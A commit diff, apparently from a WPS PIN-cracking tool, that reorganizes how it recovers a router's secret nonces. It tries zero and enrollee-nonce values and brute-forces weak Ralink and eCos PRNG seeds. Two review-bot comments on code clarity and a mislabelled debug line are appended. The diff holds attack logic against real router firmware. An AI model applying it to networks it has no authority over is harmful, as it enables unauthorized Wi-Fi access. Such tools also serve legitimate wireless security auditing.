Reorganized auto mode logic

This commit is contained in:
wiire-a 2017-12-20 12:32:40 +01:00
parent 57e3309cfe
commit 0eb8050d6c
2 changed files with 76 additions and 66 deletions


@ -864,7 +864,10 @@ usage_err:
goto usage_err;
}
DEBUG_PRINT("Debugging enabled");
if (wps->mode_auto) { /* Mode auto, order by probability */
DEBUG_PRINT("Mode is auto (no --mode specified)");
if (!memcmp(wps->pke, wps_rtl_pke, WPS_PKEY_LEN)) {
p_mode[0] = RTL819x;
p_mode[1] = NONE;
@ -884,7 +887,6 @@ usage_err:
}
}
DEBUG_PRINT("Debugging enabled");
DEBUG_PRINT("Modes: %d (%s), %d (%s), %d (%s), %d (%s), %d (%s)",
p_mode[0], p_mode_name[p_mode[0]],
p_mode[1], p_mode_name[p_mode[1]],
@ -1031,9 +1033,9 @@ usage_err:
}
}
/* E-S1 = E-S2 = 0 */
wps->e_s1 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s1) goto memory_err;
wps->e_s2 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s2) goto memory_err;
/* Allocating memory for E-S1 and E-S2 */
wps->e_s1 = malloc(WPS_SECRET_NONCE_LEN); if (!wps->e_s1) goto memory_err;
wps->e_s2 = malloc(WPS_SECRET_NONCE_LEN); if (!wps->e_s2) goto memory_err;
/* Allocating memory for digests */
wps->psk1 = malloc(WPS_HASH_LEN); if (!wps->psk1) goto memory_err;
@ -1044,31 +1046,56 @@ usage_err:
uint_fast8_t k = 0;
uint_fast8_t found_p_mode = NONE;
uint32_t seed;
wps->nonce_seed = 0;
wps->s1_seed = 0;
wps->s2_seed = 0;
/* Attempt special cases first in auto mode */
if (wps->mode_auto) {
/* E-S1 = E-S2 = 0 */
if (memcmp(wps->pke, wps_rtl_pke, WPS_PKEY_LEN)) {
memset(wps->e_s1, 0, WPS_SECRET_NONCE_LEN);
memset(wps->e_s2, 0, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
/* E-S1 = E-S2 = N1 */
if (found_p_mode == NONE) {
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
}
/* Main loop */
while (!found_p_mode && k < MODE_LEN && p_mode[k] != NONE) {
while (found_p_mode == NONE && k < MODE_LEN && p_mode[k] != NONE) {
/* 1 */
if (p_mode[k] == RT) {
DEBUG_PRINT(" * Mode: %d (%s)", RT, p_mode_name[RT]);
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
if (!wps->mode_auto) {
memset(wps->e_s1, 0, WPS_SECRET_NONCE_LEN);
memset(wps->e_s2, 0, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
if (!found_p_mode) {
if (found_p_mode == NONE) {
init_crack_jobs(wps, RT);
wps->nonce_seed = collect_crack_jobs();
if (wps->nonce_seed != 0) {
@ -1089,17 +1116,15 @@ usage_err:
for (int i = 0; i < WPS_NONCE_LEN; i++)
wps->e_s2[i] = ralink_randbyte(&prng);
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
else {
DEBUG_PRINT("Nonce doesn't appear to be generated by this mode, skipping...");
}
}
/* 2 */
@ -1109,8 +1134,7 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", ECOS_SIMPLE, p_mode_name[ECOS_SIMPLE]);
uint32_t known = wps->e_nonce[0] << 25; /* Reducing entropy from 32 to 25 bits */
uint32_t counter = 0;
seed = 0;
uint32_t seed, counter = 0;
while (counter < 0x02000000) {
int i;
seed = known | counter;
@ -1133,14 +1157,8 @@ usage_err:
}
if (wps->s1_seed) { /* Seed found */
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = ECOS_SIMPLE;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
@ -1155,19 +1173,14 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", RTL819x, p_mode_name[RTL819x]);
/* E-S1 = E-S2 = E-Nonce - Best case scenario */
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
if (!wps->mode_auto) {
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
if (found_p_mode == NONE) {
@ -1230,10 +1243,10 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", ECOS_SIMPLEST, p_mode_name[ECOS_SIMPLEST]);
uint32_t index = 0;
uint32_t seed, index = 0;
do {
int i;
seed = index;
uint_fast8_t i;
for (i = 0; i < WPS_NONCE_LEN; i++) {
if (wps->e_nonce[i] != (uint8_t) ecos_rand_simplest(&seed))
break;
@ -1256,14 +1269,8 @@ usage_err:
} while (index != 0xffffffff);
if (wps->nonce_seed) { /* Seed found */
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = ECOS_SIMPLEST;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
@ -1278,10 +1285,10 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", ECOS_KNUTH, p_mode_name[ECOS_KNUTH]);
uint32_t index = 0;
uint32_t seed, index = 0;
do {
int i;
seed = index;
uint_fast8_t i;
for (i = 0; i < WPS_NONCE_LEN; i++) {
if (wps->e_nonce[i] != (uint8_t) ecos_rand_knuth(&seed))
break;
@ -1304,14 +1311,8 @@ usage_err:
} while (index != 0xffffffff);
if (wps->nonce_seed) { /* Seed found */
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = ECOS_KNUTH;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
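Review bot: The new auto-mode pre-pass in the `@ -1044` hunk skips the E-S1 = E-S2 = 0 attempt when `memcmp(wps->pke, wps_rtl_pke, WPS_PKEY_LEN)` is zero, but neither the `/* E-S1 = E-S2 = 0 */` comment nor the condition says why a Realtek public key disables that attempt; a reader has to go back to the `@ -864` hunk to infer that such keys are ordered as RTL819x-only. I would write the guard as `if (memcmp(wps->pke, wps_rtl_pke, WPS_PKEY_LEN) != 0) { /* zero secret nonces are not a Realtek pattern; skip */` so the intent is explicit and the bare `memcmp` is not read as a boolean "matches". The same `!found_p_mode` → `found_p_mode == NONE` normalization is applied consistently in the `@ -1044` loop header, which is good; the remaining per-mode `if (!wps->mode_auto)` blocks (RT in `@ -1044`, RTL819x in `@ -1155`) repeat the pre-pass verbatim and could share a small `static` helper, but that is optional. The enclosing function starts and ends outside these hunks, so I cannot confirm that `found_p_mode` is only ever compared against `NONE` elsewhere.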


@ -49,12 +49,21 @@
#endif
#if defined(DEBUG)
# define DEBUG_PRINT(fmt, args...) do { printf("\n [DEBUG] %s:%d:%s(): " fmt, \
# define DEBUG_PRINT(fmt, args...) do { printf("\n [DEBUG] %s:%4d:%s(): " fmt, \
__FILE__, __LINE__, __func__, ##args); fflush(stdout); } while (0)
# define DEBUG_PRINT_ARRAY(b, l) do { byte_array_print(b, l); fflush(stdout); } while (0)
# define DEBUG_PRINT_ATTEMPT(s, z) \
do { \
printf("\n [DEBUG] %s:%4d:%s(): Trying with E-S1: ", __FILE__, __LINE__, __func__); \
byte_array_print(s, WPS_SECRET_NONCE_LEN); \
printf("\n [DEBUG] %s:%4d:%s(): Trying with E-S1: ", __FILE__, __LINE__, __func__); \
byte_array_print(z, WPS_SECRET_NONCE_LEN); \
fflush(stdout); \
} while (0)
#else
# define DEBUG_PRINT(fmt, args...) do {} while (0)
# define DEBUG_PRINT_ARRAY(b, l) do {} while (0)
# define DEBUG_PRINT_ATTEMPT(s, z) do {} while (0)
#endif
uint_fast8_t p_mode[MODE_LEN] = { 0 };
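Review bot: The second `printf` in the new `DEBUG_PRINT_ATTEMPT` macro labels the E-S2 buffer as "E-S1", so debug output shows two lines both titled "Trying with E-S1: " and a reader cannot tell which nonce is which; change it to `printf("\n [DEBUG] %s:%4d:%s(): Trying with E-S2: ", __FILE__, __LINE__, __func__); \`. Since every call site in the other file now routes through this macro instead of the old `DEBUG_PRINT`/`DEBUG_PRINT_ARRAY` pairs, the mislabel affects all of them. The macro also relies on `WPS_SECRET_NONCE_LEN` being visible wherever the header is included; that appears to hold for the callers in this commit, but a short comment on the macro stating that `s` and `z` must each be `WPS_SECRET_NONCE_LEN` bytes would document the contract.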